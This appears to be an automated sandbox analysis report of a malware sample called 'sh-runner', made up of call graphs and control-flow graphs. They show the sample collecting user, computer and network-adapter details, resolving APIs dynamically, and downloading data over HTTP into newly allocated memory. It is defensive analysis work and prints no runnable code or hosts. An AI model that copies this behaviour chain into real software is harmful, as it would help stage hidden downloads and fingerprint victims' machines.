6456 184be56d510 LdrGetProcedureAddress 6455->6456 6457 184be571cc6 6456->6457 6458 184be56d510 LdrGetProcedureAddress 6457->6458 6459 184be571ce1 6458->6459 6460 184be56d510 LdrGetProcedureAddress 6459->6460 6461 184be571cfc 6460->6461 6462 184be56d510 LdrGetProcedureAddress 6461->6462 6463 184be571d17 6462->6463 6464 184be56d510 LdrGetProcedureAddress 6463->6464 6465 184be571d32 6464->6465 6466 184be56d510 LdrGetProcedureAddress 6465->6466 6467 184be571d4d 6466->6467 6468 184be56d510 LdrGetProcedureAddress 6467->6468 6469 184be571d68 6468->6469 6470 184be56d510 LdrGetProcedureAddress 6469->6470 6471 184be571d83 6470->6471 6472 184be56d510 LdrGetProcedureAddress 6471->6472 6472->6445 6541 184be570d00 6542 184be570d33 6541->6542 6543 184be570e17 6542->6543 6544 184be56d510 LdrGetProcedureAddress 6542->6544 6544->6543 6899 184be56dbc0 6900 184be56dc3c 6899->6900 6901 184be575ee0 NtAddBootEntry 6900->6901 6905 184be56dc5a 6900->6905 6901->6905 6902 184be56dc80 6903 184be573830 NtAddBootEntry 6903->6905 6904 184be56fc80 NtAddBootEntry 6904->6905 6905->6902 6905->6903 6905->6904 6906 184be5710c0 6907 184be5710f3 6906->6907 6908 184be56d510 LdrGetProcedureAddress 6907->6908 6921 184be57127d 6907->6921 6909 184be5711db 6908->6909 6910 184be56d510 LdrGetProcedureAddress 6909->6910 6911 184be5711f6 6910->6911 6912 184be56d510 LdrGetProcedureAddress 6911->6912 6913 184be571211 6912->6913 6914 184be56d510 LdrGetProcedureAddress 6913->6914 6915 184be57122c 6914->6915 6916 184be56d510 LdrGetProcedureAddress 6915->6916 6917 184be571247 6916->6917 6918 184be56d510 LdrGetProcedureAddress 6917->6918 6919 184be571262 6918->6919 6920 184be56d510 LdrGetProcedureAddress 6919->6920 6920->6921 6473 184be563626 6474 184be56364b 6473->6474 6476 184be563718 6474->6476 6477 184be5682e0 6474->6477 6478 184be568324 6477->6478 6481 184be56841c 6477->6481 6479 184be56fa90 NtAddBootEntry 6478->6479 6478->6481 6480 184be56833f 6479->6480 6480->6481 6482 184be574af0 NtAddBootEntry 6480->6482 6481->6476 6482->6481 6111 184be567d70 6116 184be567da1 6111->6116 6112 184be567f52 GetUserNameA 6120 184be567f70 6112->6120 6113 184be567ff3 GetComputerNameExA 6114 184be568016 6113->6114 6115 184be56805b 6113->6115 6114->6115 6119 184be568034 GetComputerNameExA 6114->6119 6117 184be56809e GetAdaptersInfo 6115->6117 6116->6112 6118 184be5680bc 6117->6118 6122 184be5680f1 6117->6122 6121 184be5680da GetAdaptersInfo 6118->6121 6118->6122 6119->6115 6120->6113 6121->6122 6125 184be560cc0 6122->6125 6124 184be5681ae 6126 184be560cd0 6125->6126 6128 184be560ce0 6126->6128 6129 184be575d30 6126->6129 6128->6124 6132 184be574050 6129->6132 6133 184be5740e1 6132->6133 6134 184be574087 6132->6134 6133->6128 6134->6133 6135 184be5740df NtAddBootEntry 6134->6135 6135->6133 6319 184be563770 6320 184be5637ab 6319->6320 6321 184be5638dd 6320->6321 6322 184be563809 6320->6322 6323 184be56c3b0 3 API calls 6321->6323 6327 184be5638a1 6322->6327 6328 184be56f5b0 6322->6328 6323->6327 6329 184be56f615 6328->6329 6330 184be575dc0 NtAddBootEntry 6329->6330 6333 184be56f706 6329->6333 6330->6333 6331 184be563861 6331->6327 6334 184be56c3b0 6331->6334 6332 184be575dc0 NtAddBootEntry 6332->6331 6333->6331 6333->6332 6335 184be56c3ef 6334->6335 6336 184be56c55c 6335->6336 6337 184be56fa90 NtAddBootEntry 6335->6337 6336->6327 6342 184be56c456 6337->6342 6338 184be56c528 6338->6336 6351 184be56e290 6338->6351 6340 184be56c57d 6340->6336 6341 184be56e290 NtAddBootEntry 6340->6341 6341->6336 6342->6336 6342->6338 6344 184be574af0 6342->6344 6345 184be574b19 6344->6345 6349 184be574b3a 6344->6349 6346 184be574b74 6345->6346 6347 184be574b1e 6345->6347 6355 184be5736f0 6346->6355 6347->6349 6350 184be574af0 NtAddBootEntry 6347->6350 6349->6338 6350->6349 6352 184be56e2db 6351->6352 6353 184be56e2ef 6352->6353 6354 184be5739e0 NtAddBootEntry 6352->6354 6353->6340 6354->6353 6356 184be5737ec 6355->6356 6357 184be573763 6355->6357 6356->6349 6357->6356 6358 184be5737ea NtAddBootEntry 6357->6358 6358->6356 6359 184be563970 6361 184be5639a1 6359->6361 6360 184be563a18 6361->6360 6362 184be561730 NtAddBootEntry 6361->6362 6362->6360 6363 184be562270 6364 184be562288 6363->6364 6365 184be570e40 LdrGetProcedureAddress 6364->6365 6366 184be5622a2 6365->6366 6209 184be5736f0 6210 184be5737ec 6209->6210 6211 184be573763 6209->6211 6211->6210 6212 184be5737ea NtAddBootEntry 6211->6212 6212->6210 6483 184be570b30 6484 184be570b56 6483->6484 6485 184be570cd1 6484->6485 6486 184be56d510 LdrGetProcedureAddress 6484->6486 6487 184be570c14 6486->6487 6488 184be56d510 LdrGetProcedureAddress 6487->6488 6489 184be570c2f 6488->6489 6490 184be56d510 LdrGetProcedureAddress 6489->6490 6491 184be570c4a 6490->6491 6492 184be56d510 LdrGetProcedureAddress 6491->6492 6493 184be570c65 6492->6493 6494 184be56d510 LdrGetProcedureAddress 6493->6494 6495 184be570c80 6494->6495 6496 184be56d510 LdrGetProcedureAddress 6495->6496 6497 184be570c9b 6496->6497 6498 184be56d510 LdrGetProcedureAddress 6497->6498 6499 184be570cb6 6498->6499 6500 184be56d510 LdrGetProcedureAddress 6499->6500 6500->6485 6501 184be565931 6502 184be565983 6501->6502 6505 184be5685d0 6502->6505 6504 184be5659e3 6506 184be5685fd 6505->6506 6507 184be56f5b0 NtAddBootEntry 6506->6507 6508 184be56864e 6507->6508 6509 184be5682e0 2 API calls 6508->6509 6510 184be568690 6508->6510 6509->6510 6510->6504 6545 184be5718f0 6546 184be571917 6545->6546 6547 184be56d510 LdrGetProcedureAddress 6546->6547 6570 184be571b1a 6546->6570 6548 184be5719f1 6547->6548 6549 184be56d510 LdrGetProcedureAddress 6548->6549 6550 184be571a0c 6549->6550 6551 184be56d510 LdrGetProcedureAddress 6550->6551 6552 184be571a27 6551->6552 6553 184be56d510 LdrGetProcedureAddress 6552->6553 6554 184be571a42 6553->6554 6555 184be56d510 LdrGetProcedureAddress 6554->6555 6556 184be571a5d 6555->6556 6557 184be56d510 LdrGetProcedureAddress 6556->6557 6558 184be571a78 6557->6558 6559 184be56d510 LdrGetProcedureAddress 6558->6559 6560 184be571a93 6559->6560 6561 184be56d510 LdrGetProcedureAddress 6560->6561 6562 184be571aae 6561->6562 6563 184be56d510 LdrGetProcedureAddress 6562->6563 6564 184be571ac9 6563->6564 6565 184be56d510 LdrGetProcedureAddress 6564->6565 6566 184be571ae4 6565->6566 6567 184be56d510 LdrGetProcedureAddress 6566->6567 6568 184be571aff 6567->6568 6569 184be56d510 LdrGetProcedureAddress 6568->6569 6569->6570

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 184be567d70-184be567d9f 1 184be567db5-184be567dc5 0->1 2 184be567da1-184be567dae call 184be56e850 0->2 3 184be567dcb-184be567dd4 1->3 4 184be567e5e-184be567ecb call 184be56e6f0 * 2 call 184be56e630 1->4 2->1 3->4 6 184be567dda-184be567e0f 3->6 20 184be567f48-184be567f4d call 184be56e630 4->20 21 184be567ecd-184be567ee9 4->21 16 184be567e15-184be567e36 call 184be570320 6->16 22 184be567e38-184be567e39 16->22 25 184be567f52-184be567f6e GetUserNameA 20->25 21->20 30 184be567eeb-184be567f0d 21->30 24 184be567e3b-184be567e5c call 184be570320 22->24 24->4 28 184be567fe9-184be567fee call 184be56e630 25->28 29 184be567f70-184be567f8c 25->29 33 184be567ff3-184be568014 GetComputerNameExA 28->33 29->28 38 184be567f8e-184be567fae 29->38 39 184be567f21-184be567f26 call 184be56e630 30->39 40 184be567f0f-184be567f1f call 184be56e5c0 30->40 36 184be568016-184be568032 33->36 37 184be568094-184be568099 call 184be56e630 33->37 36->37 51 184be568034-184be568059 GetComputerNameExA 36->51 45 184be56809e-184be5680ba GetAdaptersInfo 37->45 52 184be567fc2-184be567fc7 call 184be56e630 38->52 53 184be567fb0-184be567fc0 call 184be56e5c0 38->53 44 184be567f2b-184be567f46 39->44 40->44 44->25 49 184be568129-184be56812e call 184be56e630 45->49 50 184be5680bc-184be5680d8 45->50 63 184be568133-184be56829b call 184be56e790 call 184be56e630 * 4 call 184be560cc0 call 184be56e630 call 184be56e690 call 184be56e630 * 8 call 184be56e690 call 184be56e630 49->63 50->49 68 184be5680da-184be5680ef GetAdaptersInfo 50->68 57 184be56805b-184be56806b call 184be56e5c0 51->57 58 184be56806d-184be568072 call 184be56e630 51->58 62 184be567fcc-184be567fe7 52->62 53->62 66 184be568077-184be568092 57->66 58->66 62->33 66->45 72 184be568102-184be568107 call 184be56e630 68->72 73 184be5680f1-184be568100 call 184be56e760 68->73 78 184be56810c-184be568127 72->78 73->78 78->63
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3055615304.00000184BE560000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000184BE560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_184be560000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: Name$AdaptersComputerInfo$User
                                                                      • String ID:
                                                                      • API String ID: 1713523329-3916222277
                                                                      • Opcode ID: 847f31a267256c4b477c3e55c6d651f5123c8fbdc2e5fbf7ef3bfa4e34fd3b77
                                                                      • Instruction ID: 0493fcf3ea78bd872395a2f7220a21b2ceae6d608a9c6e2a13d06c277b50a0b9
                                                                      • Opcode Fuzzy Hash: 847f31a267256c4b477c3e55c6d651f5123c8fbdc2e5fbf7ef3bfa4e34fd3b77
                                                                      • Instruction Fuzzy Hash: A1F13F70314909CFEB94EB68D495BA6B3E2FB9C340F408578E589C7296DE34EE45CB42
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000003.2025333066.00000184BE540000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000184BE540000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_3_184be540000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryVirtual$AllocateProtect
                                                                      • String ID:
                                                                      • API String ID: 2931642484-0
                                                                      • Opcode ID: 670168b2314164816ad4fff62a771d92f35dcb7a52677c9802cb5d6c25b1cd75
                                                                      • Instruction ID: d86569eeaf66e34ca2ccef4ac78980573b420741214eca21dc33aff0f227e5b3
                                                                      • Opcode Fuzzy Hash: 670168b2314164816ad4fff62a771d92f35dcb7a52677c9802cb5d6c25b1cd75
                                                                      • Instruction Fuzzy Hash: CE71177061CA494BE76C9B6CD8427BAB7E1F7C4310F60962DF887C3296DE34D9428782

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 115 184be2a044e-184be2a0474 HttpOpenRequestA 121 184be2a0475-184be2a04af 115->121 127 184be2a04d0-184be2a04ed 121->127 128 184be2a04b1-184be2a04bd 121->128 133 184be2a04ef-184be2a0535 VirtualAlloc InternetReadFile 127->133 134 184be2a04cb call 184be2a053d 127->134 135 184be2a04be 128->135 136 184be2a04bf-184be2a04c7 128->136 133->134 138 184be2a053b-184be2a053c 133->138 134->127 135->136 136->134 140 184be2a04c9 136->140 140->121
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000184BE2A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_184be2a0000_sh-runner.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocFileHttpInternetOpenReadRequestVirtual
                                                                      • String ID: U.;
                                                                      • API String ID: 1187293180-4213443877
                                                                      • Opcode ID: 5690493dc9ff9f8f16933898c455d2a5e8e45ea3ee84a79ee5b969fd92fa3e91
                                                                      • Instruction ID: 4d8085325d0376d757ff59a0a3720a7d39b94022f9a8cc26d6e71faef9c845c4
                                                                      • Opcode Fuzzy Hash: 5690493dc9ff9f8f16933898c455d2a5e8e45ea3ee84a79ee5b969fd92fa3e91
                                                                      • Instruction Fuzzy Hash: 0B3106A030EB882FF21E01A93C6AB362AD9D79A351F15419FF10DC71E3EC44CC06826A

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 141 184be2a03b2-184be2a03e4 InternetConnectA call 184be2a044e 144 184be2a044e-184be2a0455 141->144 145 184be2a03e6 141->145 148 184be2a0456-184be2a045a 144->148 146 184be2a041f 145->146 147 184be2a03e8-184be2a03f0 145->147 146->148 151 184be2a0421-184be2a0423 146->151 149 184be2a045e-184be2a045f 147->149 150 184be2a03f2-184be2a03f9 147->150 148->149 154 184be2a0460-184be2a046d HttpOpenRequestA 149->154 152 184be2a044b-184be2a044d 150->152 153 184be2a03fb-184be2a03fc 150->153 155 184be2a049f-184be2a04af 151->155 156 184be2a0425-184be2a0426 151->156 152->144 157 184be2a03fe-184be2a0404 153->157 158 184be2a0477-184be2a0499 153->158 159 184be2a046f-184be2a0470 154->159 169 184be2a04b1 155->169 171 184be2a04d0-184be2a04ed 155->171 156->154 160 184be2a0428-184be2a0431 156->160 157->152 161 184be2a0406-184be2a0415 157->161 164 184be2a049a-184be2a049d 158->164 162 184be2a0472-184be2a0474 159->162 163 184be2a0433-184be2a0435 160->163 160->164 161->159 166 184be2a0417-184be2a0418 161->166 167 184be2a0475-184be2a0476 162->167 163->169 170 184be2a0437-184be2a0442 163->170 164->155 166->162 172 184be2a041a-184be2a041e 166->172 167->158 173 184be2a04b2 169->173 170->173 174 184be2a0444-184be2a0448 170->174 181 184be2a04ef-184be2a0535 VirtualAlloc InternetReadFile 171->181 182 184be2a04cb call 184be2a053d 171->182 172->146 175 184be2a04b6-184be2a04b9 173->175 177 184be2a04bd 174->177 178 184be2a044a 174->178 175->177 179 184be2a04be 177->179 180 184be2a04bf-184be2a04c7 177->180 178->152 178->175 179->180 180->182 186 184be2a04c9 180->186 181->182 184 184be2a053b-184be2a053c 181->184 182->171 186->167
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000184BE2A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_184be2a0000_sh-runner.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Internet$AllocConnectFileHttpOpenReadRequestVirtual
                                                                      • String ID: U.;
                                                                      • API String ID: 258568742-4213443877
                                                                      • Opcode ID: 6fc8f7e9d39f1beb81a02fe686e0033c171592fa012045b2ecca9d2f46ba6301
                                                                      • Instruction ID: 96b469c47470d191f7012530f4572d08aed63898e93313ee7c318b87a49ededd
                                                                      • Opcode Fuzzy Hash: 6fc8f7e9d39f1beb81a02fe686e0033c171592fa012045b2ecca9d2f46ba6301
                                                                      • Instruction Fuzzy Hash: F441257020DB8A2FF73E42641C55F7A3BA8F792711F00929FE646CA0E3DC149E069365

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3055111517.00000184BE2A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000184BE2A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_184be2a0000_sh-runner.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InternetLibraryLoadOpen
                                                                      • String ID: wini
                                                                      • API String ID: 2559873147-1606035523
                                                                      • Opcode ID: 0662d3df314d0fc764c5b615890f2d42f03bb8aebb061ff02a7170b5085c526b
                                                                      • Instruction ID: ff494dc53b0d891822866c532e749412b0e8937f8d4d391566143381ba6b658d
                                                                      • Opcode Fuzzy Hash: 0662d3df314d0fc764c5b615890f2d42f03bb8aebb061ff02a7170b5085c526b
                                                                      • Instruction Fuzzy Hash: 5FF0E5A060E68C2FE32D5EB49C8A9373F9DDB57309316969FF086C25B3CD614C419325

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • CreateFiberEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,000168BF,?,?,00000184BE562904), ref: 00000184BE571F66
                                                                      • DeleteFiber.KERNELBASE(?,?,?,?,?,?,?,?,?,?,000168BF,?,?,00000184BE562904), ref: 00000184BE571F8E
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3055615304.00000184BE560000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000184BE560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_184be560000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: Fiber$CreateDelete
                                                                      • String ID:
                                                                      • API String ID: 2527733159-0
                                                                      • Opcode ID: e666d9c0b0ba46b256699f288a6e5ecb4e148a06e009019892e951112d41f9a7
                                                                      • Instruction ID: 0657fabcb8723877ccc9089d5f707d62be6e7a86e008e5cfe09b50fc5f0b43b0
                                                                      • Opcode Fuzzy Hash: e666d9c0b0ba46b256699f288a6e5ecb4e148a06e009019892e951112d41f9a7
                                                                      • Instruction Fuzzy Hash: 37315E70214A098FE7A4EF68C448BAAF7E1FF98311F6445B9E089C3291EF34D551CB46

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 212 184be56d510-184be56d53e 213 184be56d546-184be56d548 212->213 214 184be56d540-184be56d544 212->214 216 184be56d63a-184be56d64a 213->216 214->213 215 184be56d54d-184be56d583 214->215 217 184be56d585-184be56d589 215->217 217->213 218 184be56d58b-184be56d5ac call 184be56b450 217->218 221 184be56d632-184be56d635 218->221 222 184be56d5b2-184be56d5cf 218->222 221->217 223 184be56d5d8-184be56d5e5 222->223 224 184be56d5d1-184be56d5d6 222->224 223->224 225 184be56d5e7-184be56d611 call 184be572ab0 223->225 224->216 225->213 228 184be56d617-184be56d62b LdrGetProcedureAddress 225->228 228->224 229 184be56d62d 228->229 229->213
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.3055615304.00000184BE560000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000184BE560000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_184be560000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProcedure
                                                                      • String ID:
                                                                      • API String ID: 3653107232-0
                                                                      • Opcode ID: c880d098a533d0f3fb35a3b8b130c654e78c7eb0b2f2c7cb6df4c980cc83c31e
                                                                      • Instruction ID: bb186f58f14e76168ebbbdef48de5f9db1aa7e9ec36de70b15600b9b382cb916
                                                                      • Opcode Fuzzy Hash: c880d098a533d0f3fb35a3b8b130c654e78c7eb0b2f2c7cb6df4c980cc83c31e
                                                                      • Instruction Fuzzy Hash: 5C410AB1118A058FE768EB58DC85BF6B3E0FBD5358F54493DE48AC3251EE30E9428786